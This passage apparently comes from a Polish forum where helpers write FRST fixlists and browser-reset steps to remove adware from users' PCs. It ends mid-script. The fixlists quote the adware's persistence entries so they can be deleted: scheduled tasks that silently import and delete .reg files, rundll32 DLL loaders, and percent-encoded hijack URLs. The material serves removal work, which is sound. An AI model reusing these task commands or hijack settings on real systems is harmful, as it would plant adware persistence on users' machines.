Akcje do wdrożenia: 1. Odinstaluj stare wersje: Adobe AIR, Java 7 Update 51, Java 7 Update 9 (64-bit), Real Alternative 2.0.2. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {4F5BB314-8043-4D42-960D-21C37436A5BD} - System32\Tasks\WinTaske => C:\Program Files (x86)\WinTaske\WinTaske\WinTaske.exe [2016-01-25] () S2 Winsere; C:\Program Files (x86)\Winsere\Winsere\Winsere.exe [295096 2016-01-25] () S3 massfilter; system32\drivers\massfilter.sys [X] U4 WMCoreService; Brak ImagePath S3 ZTEusbmdm6k; system32\DRIVERS\ZTEusbmdm6k.sys [X] S3 ZTEusbnmea; system32\DRIVERS\ZTEusbnmea.sys [X] S3 ZTEusbser6k; system32\DRIVERS\ZTEusbser6k.sys [X] HKLM-x32\...\Run: [] => [X] HKU\S-1-5-21-1983712293-639761611-1462550138-1000\...\Run: [GoogleDriveSync] => "C:\Program Files (x86)\Google\Drive\googledrivesync.exe" /autostart Startup: C:\Users\wizard\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe Quick Launcher.lnk [2014-02-04] GroupPolicyScripts: Ograniczenia HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com HKU\S-1-5-21-1983712293-639761611-1462550138-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.interia.pl/#utm_source=instalki1&utm_medium=installer&utm_campaign=instalki1&iwa_source=installer_instalki Toolbar: HKLM - Brak nazwy - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - Brak pliku FF HKLM-x32\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF DeleteKey: HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I DeleteKey: HKCU\Software\dobreprogramy DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\do-search DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Uninstall ior DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes DisableService: PLAY ONLINE. RunOuc RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\Program Files (x86)\SearchesToYesbnd RemoveDirectory: C:\Program Files (x86)\Winsere RemoveDirectory: C:\Program Files (x86)\WinTaske RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDF Editor 3.3 RemoveDirectory: C:\Users\wizard\AppData\Local\3810282D-6C19-47B0-8283-5C6C29A7E108 RemoveDirectory: C:\Users\wizard\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Core FTP (x64) RemoveDirectory: C:\Users\wizard\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Deluxe Ski Jump 2.1 Folder: C:\ProgramData\Installations Folder: C:\Users\Public\Documents\dmp C:\Users\wizard\IP_Log_Data.js C:\Users\wizard\Network_Meter_Data.js C:\Users\wizard\AppData\Roaming\Network Meter_Usage.ini C:\Users\wizard\Links\100D3100.lnk C:\Users\wizard\Links\WYSYŁKI.lnk CMD: netsh advfirewall reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść przeglądarki: Firefox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść całą historię przeglądania. Następnie zamknij Firefox. Klawisz z flagą Windows + R, wklej komendę firefox -p i w Menedżerze profilów pousuwaj wszystkie z wyjątkiem bieżącego. Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Zresetuj cache wtyczek. W pasku adresów wpisz chrome://plugins i ENTER. Na liście wtyczek wybierz dowolną i kliknij Wyłącz. Następnie wtyczkę ponownie Włącz. 4. Zrób nowy log FRST z opcji Skanuj (Scan), już bez Addition i Shortcut. Dołącz też plik fixlog.txt.

Działania do przeprowadzenia: 1. Odinstaluj starą wersję Adobe AIR oraz adware Customer Promos. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {03C4A846-C55C-43F1-BBD2-552CC596A3C3} - System32\Tasks\psv_BigTinhold => /c regedit.exe /s "C:\ProgramData\Zonzap\Finfix.reg" & del "C:\ProgramData\Zonzap\Finfix.reg" & SCHTASKS /Delete /TN "psv_BigTinhold" /F Task: {135F1949-A41F-49CB-A796-4C6465D6C2BB} - System32\Tasks\psv_DentoFan => /c regedit.exe /s "C:\ProgramData\Zonzap\TrippleDax.reg" & del "C:\ProgramData\Zonzap\TrippleDax.reg" & SCHTASKS /Delete /TN "psv_DentoFan" /F Task: {14DA0A52-88B4-4CAA-8BA0-FB5967E2369F} - System32\Tasks\psv_X-tax => /c regedit.exe /s "C:\ProgramData\Zonzap\NimTone.reg" & del "C:\ProgramData\Zonzap\NimTone.reg" & SCHTASKS /Delete /TN "psv_X-tax" /F Task: {18AF6270-769B-4C66-BA43-6AD0DD2F8154} - System32\Tasks\psv_Kan-Tech => /c regedit.exe /s "C:\ProgramData\Zonzap\Alphatom.reg" & del "C:\ProgramData\Zonzap\Alphatom.reg" & SCHTASKS /Delete /TN "psv_Kan-Tech" /F Task: {1928E442-233F-45F1-9B98-2E98838A139D} - System32\Tasks\psv_Transbam => /c regedit.exe /s "C:\ProgramData\Zonzap\Doubleflex.reg" & del "C:\ProgramData\Zonzap\Doubleflex.reg" & SCHTASKS /Delete /TN "psv_Transbam" /F Task: {236DC4F2-F18E-4298-9AD7-E0A4E9CE5570} - System32\Tasks\snf => C:\ProgramData\Zonzap\Zonzap.exe Task: {27C1C905-FA40-42BC-BC18-630AA60302C3} - System32\Tasks\psv_Zathlex => /c regedit.exe /s "C:\ProgramData\Zonzap\StanTam.reg" & del "C:\ProgramData\Zonzap\StanTam.reg" & SCHTASKS /Delete /TN "psv_Zathlex" /F Task: {2D080CDF-9580-46D5-B180-65AFF17ECBD3} - System32\Tasks\psv_Touch-Tip => /c regedit.exe /s "C:\ProgramData\Zonzap\Inchphase.reg" & del "C:\ProgramData\Zonzap\Inchphase.reg" & SCHTASKS /Delete /TN "psv_Touch-Tip" /F Task: {30936E52-451E-468F-BC91-4595BD08FF25} - System32\Tasks\psv_TransRonplus => /c regedit.exe /s "C:\ProgramData\Zonzap\Tampsaoflex.reg" & del "C:\ProgramData\Zonzap\Tampsaoflex.reg" & SCHTASKS /Delete /TN "psv_TransRonplus" /F Task: {35A771CF-8B2B-4EAD-88FA-F6B23AE32180} - System32\Tasks\psv_Matsaofan => /c regedit.exe /s "C:\ProgramData\Zonzap\NamLex.reg" & del "C:\ProgramData\Zonzap\NamLex.reg" & SCHTASKS /Delete /TN "psv_Matsaofan" /F Task: {37609B1F-6169-4291-B4AF-622D8C76A7F7} - System32\Tasks\psv_Stronglab => /c regedit.exe /s "C:\ProgramData\Zonzap\Goldenity.reg" & del "C:\ProgramData\Zonzap\Goldenity.reg" & SCHTASKS /Delete /TN "psv_Stronglab" /F Task: {565E5178-11D3-4CB9-9DD9-EF5D6AA97176} - System32\Tasks\psv_Ranhold => /c regedit.exe /s "C:\ProgramData\Zonzap\Quotefax.reg" & del "C:\ProgramData\Zonzap\Quotefax.reg" & SCHTASKS /Delete /TN "psv_Ranhold" /F Task: {6891420C-0C8F-47A6-8BAE-B323A3492163} - System32\Tasks\psv_Doncom => /c regedit.exe /s "C:\ProgramData\Zonzap\Confix.reg" & del "C:\ProgramData\Zonzap\Confix.reg" & SCHTASKS /Delete /TN "psv_Doncom" /F Task: {69F5C4E0-87FA-4A65-BF6E-03C816999368} - System32\Tasks\psv_Faxex => /c regedit.exe /s "C:\ProgramData\Zonzap\OzerTouch.reg" & del "C:\ProgramData\Zonzap\OzerTouch.reg" & SCHTASKS /Delete /TN "psv_Faxex" /F Task: {7EC963E4-800F-4C24-A98F-370108FFA88D} - System32\Tasks\psv_Flexlab => /c regedit.exe /s "C:\ProgramData\Zonzap\Zathjob.reg" & del "C:\ProgramData\Zonzap\Zathjob.reg" & SCHTASKS /Delete /TN "psv_Flexlab" /F Task: {89242274-01B9-4253-8BE0-7D62F96656EE} - System32\Tasks\psv_Rontrax => /c regedit.exe /s "C:\ProgramData\Zonzap\Lexihome.reg" & del "C:\ProgramData\Zonzap\Lexihome.reg" & SCHTASKS /Delete /TN "psv_Rontrax" /F Task: {8C6E243A-D310-4BED-AA16-619BE33FC5C5} - System32\Tasks\psv_Mathdex => /c regedit.exe /s "C:\ProgramData\Zonzap\Zenity.reg" & del "C:\ProgramData\Zonzap\Zenity.reg" & SCHTASKS /Delete /TN "psv_Mathdex" /F Task: {96522B62-8630-452E-A0CF-2A00496EE830} - System32\Tasks\psv_Ontohold => /c regedit.exe /s "C:\ProgramData\Zonzap\Ope-Ity.reg" & del "C:\ProgramData\Zonzap\Ope-Ity.reg" & SCHTASKS /Delete /TN "psv_Ontohold" /F Task: {9DD40D1B-D7FF-4012-B3EB-986CADA20F79} - System32\Tasks\psv_Konkis => /c regedit.exe /s "C:\ProgramData\Zonzap\Hayeco.reg" & del "C:\ProgramData\Zonzap\Hayeco.reg" & SCHTASKS /Delete /TN "psv_Konkis" /F Task: {A1F9219A-2296-496B-9682-8A957DC5AA05} - System32\Tasks\psv_Sildonron => /c regedit.exe /s "C:\ProgramData\Zonzap\Whiteing.reg" & del "C:\ProgramData\Zonzap\Whiteing.reg" & SCHTASKS /Delete /TN "psv_Sildonron" /F Task: {B53EF725-3F5D-4417-8120-490FDF5B9A7F} - System32\Tasks\psv_Stimsaobam => /c regedit.exe /s "C:\ProgramData\Zonzap\TrioZencof.reg" & del "C:\ProgramData\Zonzap\TrioZencof.reg" & SCHTASKS /Delete /TN "psv_Stimsaobam" /F Task: {B5F2BA75-E2C6-4402-8FB2-878D84A91A69} - System32\Tasks\psv_Blueflex => /c regedit.exe /s "C:\ProgramData\Zonzap\Xxx-hold.reg" & del "C:\ProgramData\Zonzap\Xxx-hold.reg" & SCHTASKS /Delete /TN "psv_Blueflex" /F Task: {B6BAB81C-13D5-48DA-B3E1-6D82C2C10F17} - System32\Tasks\psv_Stocksoft => /c regedit.exe /s "C:\ProgramData\Zonzap\Ecois.reg" & del "C:\ProgramData\Zonzap\Ecois.reg" & SCHTASKS /Delete /TN "psv_Stocksoft" /F Task: {BCA96F75-7D82-4A4F-8ECA-E84895DEBB09} - System32\Tasks\psv_Freshjayflex => /c regedit.exe /s "C:\ProgramData\Zonzap\Xxx-hattop.reg" & del "C:\ProgramData\Zonzap\Xxx-hattop.reg" & SCHTASKS /Delete /TN "psv_Freshjayflex" /F Task: {BE92E8BC-BE38-428D-9747-D2941BE64DF0} - System32\Tasks\psv_Trionix => /c regedit.exe /s "C:\ProgramData\Zonzap\Ventoair.reg" & del "C:\ProgramData\Zonzap\Ventoair.reg" & SCHTASKS /Delete /TN "psv_Trionix" /F Task: {C06C1BF8-42BA-4DF6-9728-DECB368C9B08} - System32\Tasks\psv_Tampex => /c regedit.exe /s "C:\ProgramData\Zonzap\SaltTandex.reg" & del "C:\ProgramData\Zonzap\SaltTandex.reg" & SCHTASKS /Delete /TN "psv_Tampex" /F Task: {D5B25899-2F01-4A9D-9DFE-47D2F6273593} - System32\Tasks\psv_TempFix => /c regedit.exe /s "C:\ProgramData\Zonzap\Solfan.reg" & del "C:\ProgramData\Zonzap\Solfan.reg" & SCHTASKS /Delete /TN "psv_TempFix" /F Task: {DD589265-5395-4563-9BCF-D888C030C05D} - System32\Tasks\psv_Inphase => /c regedit.exe /s "C:\ProgramData\Zonzap\DonTamlight.reg" & del "C:\ProgramData\Zonzap\DonTamlight.reg" & SCHTASKS /Delete /TN "psv_Inphase" /F Task: {DDB30AC6-93D8-4BB6-8993-5E8C0FDBD836} - System32\Tasks\psv_Faxfresh => /c regedit.exe /s "C:\ProgramData\Zonzap\Zunsaillab.reg" & del "C:\ProgramData\Zonzap\Zunsaillab.reg" & SCHTASKS /Delete /TN "psv_Faxfresh" /F Task: {E2ABA9F9-47ED-4211-BDC3-A1399DA081D1} - System32\Tasks\snp => C:\ProgramData\Zonzap\Zonzap.exe Task: {E629FAA6-12F7-4C7E-A8CB-7876F32FBAE4} - System32\Tasks\psv_Yearkix => /c regedit.exe /s "C:\ProgramData\Zonzap\Movedax.reg" & del "C:\ProgramData\Zonzap\Movedax.reg" & SCHTASKS /Delete /TN "psv_Yearkix" /F Task: {E936A61B-E55D-4CD0-AC7A-A4911B3B884D} - System32\Tasks\psv_Gravetone => /c regedit.exe /s "C:\ProgramData\Zonzap\Qvohome.reg" & del "C:\ProgramData\Zonzap\Qvohome.reg" & SCHTASKS /Delete /TN "psv_Gravetone" /F Task: {EE07FE27-FB1F-4DA2-9699-50F412883ED9} - System32\Tasks\psv_FinZencore => /c regedit.exe /s "C:\ProgramData\Zonzap\MatLatis.reg" & del "C:\ProgramData\Zonzap\MatLatis.reg" & SCHTASKS /Delete /TN "psv_FinZencore" /F Task: {F722BF27-6BF8-4AD0-8276-26F4D80EA371} - System32\Tasks\psv_Bamtax => /c regedit.exe /s "C:\ProgramData\Zonzap\Unahotla.reg" & del "C:\ProgramData\Zonzap\Unahotla.reg" & SCHTASKS /Delete /TN "psv_Bamtax" /F Task: {F93A532B-A09A-443C-BDD3-66C81EF8AEC1} - System32\Tasks\psv_JoyLa => /c regedit.exe /s "C:\ProgramData\Zonzap\Hottrax.reg" & del "C:\ProgramData\Zonzap\Hottrax.reg" & SCHTASKS /Delete /TN "psv_JoyLa" /F Task: {FAFA1468-A9BB-4ACD-BF69-B6DBA39BC4B7} - System32\Tasks\psv_Blacktam => /c regedit.exe /s "C:\ProgramData\Zonzap\Zamlax.reg" & del "C:\ProgramData\Zonzap\Zamlax.reg" & SCHTASKS /Delete /TN "psv_Blacktam" /F Task: {FE1AC1D6-A17A-41D2-B610-50469FA90DE0} - System32\Tasks\psv_CanDomfax => /c regedit.exe /s "C:\ProgramData\Zonzap\SingleJaynix.reg" & del "C:\ProgramData\Zonzap\SingleJaynix.reg" & SCHTASKS /Delete /TN "psv_CanDomfax" /F Task: {FFB00234-9648-4F8A-B2BA-0603B1C8774C} - System32\Tasks\psv_Newsoft => /c regedit.exe /s "C:\ProgramData\Zonzap\TinZamair.reg" & del "C:\ProgramData\Zonzap\TinZamair.reg" & SCHTASKS /Delete /TN "psv_Newsoft" /F R2 Service Mgr CustomerPromos; C:\ProgramData\9419acfc-a13b-418c-9e11-827a5ef0f605\plugincontainer.exe [781040 2016-02-01] () R2 Update Mgr CustomerPromos; C:\Program Files (x86)\Common Files\9419acfc-a13b-418c-9e11-827a5ef0f605\updater.exe [649456 2016-02-01] () R2 WdsManPro; C:\ProgramData\lWMiniProl\WMiniPro.exe [309384 2015-11-24] (DTools LIMITED) S2 McMPFSvc; "C:\Program Files\Common Files\McAfee\McSvcHost\McSvHost.exe" /McCoreSvc [X] R1 wfdrvr_vt_1_10_0_28; system32\drivers\wfdrvr_vt_1_10_0_28.sys [X] HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service" HKLM-x32\...\Run: [Dell Registration] => C:\Program Files (x86)\System Registration\prodreg.exe /boot HKLM-x32\...\Run: [] => [X] HKU\S-1-5-21-4029269388-3786882740-1588903154-1001\...\MountPoints2: {5e3ba2d6-b42d-11e4-bced-e006e6a1e908} - F:\Autorun.exe AppInit_DLLs: C:\ProgramData\Zonzap\Saotax.dll => Brak pliku AppInit_DLLs-x32: C:\ProgramData\Zonzap\Intop.dll => Brak pliku GroupPolicy: Ograniczenia - Chrome CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia HKU\S-1-5-21-4029269388-3786882740-1588903154-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn49PYmQ6e1krQXBFZY3csejRK0K9D9Sdyq3jtRt_LCxKdS_GmS6vfXzmn5oEOeiLgxKZgZaEScUY_QQwprGVsYvvBXKwpvnD7PrbwwI861RQRCNIGrhQ2Ql3xyGobgFBKA5_DLxw94S1JBSsEGln0UFNpr-_2b3qw,, HKU\S-1-5-21-4029269388-3786882740-1588903154-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn49PYmQ6e1krQXBFZY3csejRK0K9D9Sdyq3jtRt_LCxKdS_GmS6vfXzmn5oEOeiLgxKZgZaEScUY_QQwprGVso3c-6TkhPjVtZLRJ4XVgV7S-dvbvAFQfBucEQnOGoaLJYLzpVU5Zw-ascsN8e_AThvJxPVXgYptg,,&q={searchTerms} HKU\S-1-5-21-4029269388-3786882740-1588903154-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn49PYmQ6e1krQXBFZY3csejRK0K9D9Sdyq3jtRt_LCxKdS_GmS6vfXzmn5oEOeiLgxKZgZaEScUY_QQwprGVso3c-6TkhPjVtZLRJ4XVgV7S-dvbvAFQfBucEQnOGoaLJYLzpVU5Zw-ascsN8e_AThvJxPVXgYptg,,&q={searchTerms} HKU\S-1-5-21-4029269388-3786882740-1588903154-1000\Software\Microsoft\Internet Explorer\Main,SearchAssistant = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn49PYmQ6e1krQXBFZY3csejRK0K9D9Sdyq3jtRt_LCxKdS_GmS6vfXzmn5oEOeiLgxKZgZaEScUY_QQwprGVso3c-6TkhPjVtZLRJ4XVgV7S-dvbvAFQfBucEQnOGoaLJYLzpVU5Zw-ascsN8e_AThvJxPVXgYptg,,&q={searchTerms} HKU\S-1-5-21-4029269388-3786882740-1588903154-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn49PYmQ6e1krQXBFZY3csejRK0K9D9Sdyq3jtRt_LCxKdS_GmS6vfXzmn5oEOeiLgxKZgZaEScUY_QQwprGVso3c-6TkhPjVtZLRJ4XVgV7S-dvbvAFQfBucEQnOGoaLJYLzpVU5Zw-ascsN8e_AThvJxPVXgYptg,,&q={searchTerms} HKU\S-1-5-21-4029269388-3786882740-1588903154-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn49PYmQ6e1krQXBFZY3csejRK0K9D9Sdyq3jtRt_LCxKdS_GmS6vfXzmn5oEOeiLgxKZgZaEScUY_QQwprGVsYvvBXKwpvnD7PrbwwI861RQRCNIGrhQ2Ql3xyGobgFBKA5_DLxw94S1JBSsEGln0UFNpr-_2b3qw,, HKU\S-1-5-21-4029269388-3786882740-1588903154-1001\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn49PYmQ6e1krQXBFZY3csejRK0K9D9Sdyq3jtRt_LCxKdS_GmS6vfXzmn5oEOeiLgxKZgZaEScUY_QQwprGVso3c-6TkhPjVtZLRJ4XVgV7S-dvbvAFQfBucEQnOGoaLJYLzpVU5Zw-ascsN8e_AThvJxPVXgYptg,,&q={searchTerms} HKU\S-1-5-21-4029269388-3786882740-1588903154-1001\Software\Microsoft\Internet Explorer\Main,SearchAssistant = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn49PYmQ6e1krQXBFZY3csejRK0K9D9Sdyq3jtRt_LCxKdS_GmS6vfXzmn5oEOeiLgxKZgZaEScUY_QQwprGVso3c-6TkhPjVtZLRJ4XVgV7S-dvbvAFQfBucEQnOGoaLJYLzpVU5Zw-ascsN8e_AThvJxPVXgYptg,,&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = SearchScopes: HKLM-x32 -> ielnksrch URL = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn49PYmQ6e1krQXBFZY3csejRK0K9D9Sdyq3jtRt_LCxKdS_GmS6vfXzmn5oEOeiLgxKZgZaEScUY_QQwprGVso3c-6TkhPjVtZLRJ4XVgV7S-dvbvAFQfBucEQnOGoaLJYLzpVU5Zw-ascsN8e_AThvJxPVXgYptg,,&q={searchTerms} SearchScopes: HKU\S-1-5-21-4029269388-3786882740-1588903154-1000 -> DefaultScope {ielnksrch} URL = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn49PYmQ6e1krQXBFZY3csejRK0K9D9Sdyq3jtRt_LCxKdS_GmS6vfXzmn5oEOeiLgxKZgZaEScUY_QQwprGVso3c-6TkhPjVtZLRJ4XVgV7S-dvbvAFQfBucEQnOGoaLJYLzpVU5Zw-ascsN8e_AThvJxPVXgYptg,,&q={searchTerms} SearchScopes: HKU\S-1-5-21-4029269388-3786882740-1588903154-1000 -> {ielnksrch} URL = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn49PYmQ6e1krQXBFZY3csejRK0K9D9Sdyq3jtRt_LCxKdS_GmS6vfXzmn5oEOeiLgxKZgZaEScUY_QQwprGVso3c-6TkhPjVtZLRJ4XVgV7S-dvbvAFQfBucEQnOGoaLJYLzpVU5Zw-ascsN8e_AThvJxPVXgYptg,,&q={searchTerms} SearchScopes: HKU\S-1-5-21-4029269388-3786882740-1588903154-1001 -> DefaultScope {ielnksrch} URL = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn49PYmQ6e1krQXBFZY3csejRK0K9D9Sdyq3jtRt_LCxKdS_GmS6vfXzmn5oEOeiLgxKZgZaEScUY_QQwprGVso3c-6TkhPjVtZLRJ4XVgV7S-dvbvAFQfBucEQnOGoaLJYLzpVU5Zw-ascsN8e_AThvJxPVXgYptg,,&q={searchTerms} SearchScopes: HKU\S-1-5-21-4029269388-3786882740-1588903154-1001 -> {ielnksrch} URL = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn49PYmQ6e1krQXBFZY3csejRK0K9D9Sdyq3jtRt_LCxKdS_GmS6vfXzmn5oEOeiLgxKZgZaEScUY_QQwprGVso3c-6TkhPjVtZLRJ4XVgV7S-dvbvAFQfBucEQnOGoaLJYLzpVU5Zw-ascsN8e_AThvJxPVXgYptg,,&q={searchTerms} BHO-x32: Customer Promos -> {1bee35e9-1cfb-4032-a39d-f4f174ff5659} -> C:\Program Files (x86)\Customer Promos\Extensions\1bee35e9-1cfb-4032-a39d-f4f174ff5659.dll [2016-02-01] () StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe hxxp://www.istartsurf.com/?type=sc&ts=1448395426&z=c314220d96174c9cf1531a7g7z7z4b4cat5wdg3e7m&from=cor&uid=ST750LM022XHN-M750MBB_S2X2J90C532051532051 FF HKLM-x32\...\Firefox\Extensions: [deskCutv2@gmail.com] - C:\Users\Maja\AppData\Roaming\Mozilla\Firefox\Profiles\4qq3h4uy.default\extensions\deskCutv2@gmail.com => nie znaleziono FF HKLM-x32\...\Firefox\Extensions: [yahooprotected@gmail.com] - C:\Users\Maja\AppData\Roaming\Mozilla\Firefox\Profiles\4qq3h4uy.default\extensions\yahooprotected@gmail.com CHR HomePage: Default -> hxxp://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn49PYmQ6e1krQXBFZY3csejRK0K9D9Sdyq3jtRt_LCxKdS_GmS6vfXzmn5oEOeiLgxKZgZaEScUY_QQwprGVsosBNUm5ZXDQ7rtYcIkAFyAHMrXA6URS9C55JSyVHvgdlF8OjavW_wwdFf8XgiyumzlqzCdoFjppA,, CHR DefaultSearchURL: Default -> hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn49PYmQ6e1krQXBFZY3csejRK0K9D9Sdyq3jtRt_LCxKdS_GmS6vfXzmn5oEOeiLgxKZgZaEScUY_QQwprGVsogb2AVBcwBni3gxgvZPeW61bDhWlgWUC_K0Kk1KF6sVpERUzyG2RqRM2pmxtc5icJfxqeBFyQPBQ,,&q={searchTerms} CHR DefaultSearchKeyword: Default -> feed.sonic-search.com C:\Program Files (x86)\Customer Promos C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat C:\ProgramData\9419acfc-a13b-418c-9e11-827a5ef0f605 C:\ProgramData\lWMiniProl C:\ProgramData\Zonzap C:\ProgramData\Zonzaps C:\Users\Maja\AppData\Roaming\istartsurf C:\windows\SysWOW64\findit.xml DeleteKey: HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I DeleteKey: HKCU\Software\dobreprogramy DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Adobe Reader Speed Launcher CMD: netsh advfirewall reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść przeglądarki z adware: Firefox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść całą historię przeglądania. Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj Customer Promos, o ile już nie zniknął po w/w deinstalacji. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. 4. Napraw uszkodzony specjalny skrót IE. W pasku eksploratora wklej poniższą ścieżkę i ENTER: C:\Users\Maja\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools Prawoklik na zlokalizowany tam skrót Internet explorer (bez dodatków) > Właściwości > w polu Element docelowy po ścieżce "C:\Program Files\Internet Explorer\iexplore.exe" dopisz dwie spacje i -extoff 5. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt. Potwierdź ustąpienie problemu.

Logi z FRST zrobione na złych ustawieniach, nie tych które są opisane na forum: opcje "Lista BCD", "MD5 sterowników", "Pliki z 90 dni" nie miały być zaznaczone. Szkodnik jest ładowany poprzez Harmonogram zadań (zadania KrzysztofGyralGamecockV2 + KrzysztofMoronicallyCommodiousnessV2. Akcje do wdrożenia: 1. Odinstaluj niepożądany program Advanced System Protector. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {CDD39D3D-FCAD-4C1F-A5EB-6B52DC54D4D3} - System32\Tasks\KrzysztofGyralGamecockV2 => Rundll32.exe SickledWagerers.dll,main 7 1 Task: {E047E46E-8CF7-4005-BBA5-79373F90A1B1} - System32\Tasks\KrzysztofMoronicallyCommodiousnessV2 => Rundll32.exe HandsfulBrokages.dll,main 7 1 HKLM-x32\...\Run: [] => [X] HKU\S-1-5-21-3892785472-537833713-3556955552-1003\...\Run: [ALLUpdate] => "C:\Program Files (x86)\ALLPlayer\ALLUpdate.exe" "sleep" HKU\S-1-5-21-3892785472-537833713-3556955552-1003\...\Run: 